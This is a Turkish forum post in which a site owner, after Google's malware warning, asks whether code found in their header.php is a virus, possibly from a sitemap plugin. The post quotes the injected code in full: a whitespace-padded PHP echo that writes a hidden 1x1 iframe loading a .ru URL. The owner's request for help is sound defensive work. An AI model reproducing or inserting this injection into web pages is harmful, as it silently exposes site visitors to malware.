Googlede sitem bu site sisteminize zarar verebilir uyarısı verdikten sonra biraz araştırdım ve Bu aşağıdaki kodu header.php de buldum sitemi sitecheck.securi sitesinde tarattım ve bana yol olarak her ne kadar user.css ve jquary-akordion-menu/skin.php yi göstersede ben header.php içinde aşağıdaki kodları buldum. Çünkü sitecheck.securi ve google sağlık analizinde çıkan kodlar bu kodlardı. Sizce virusmu bu yoksa 1 defaya mahsus mu yerleşmiş eklenti sonucu. Dün ağırlıklı olarak 10 defa aynı eklenti olan uğur un açmış olduğu konudaki Better Google Sitemaps Generatör yüklemiştim.
Bunun geldiği ana bir dosya varmıdır. CSS içinde falan.
<?
#744345#
                                                                                                                                                                                                                                                          echo "                                                                                                                                                                                                                                                          <script type=\"text/javascript\" language=\"javascript\" >                                                                                                                                                                                                                                                          (function () {    var txk = document.createElement('iframe');    txk.src = 'http://ivkikcop.ru/count9.php';    txk.style.position = 'absolute';    txk.style.border = '0';    txk.style.height = '1px';    txk.style.width = '1px';    txk.style.left = '1px';    txk.style.top = '1px';    if (!document.getElementById('txk')) {        document.write('<div id=\'txk\'></div>');        document.getElementById('txk').appendChild(txk);    }})();</script>";

#/744345#
?>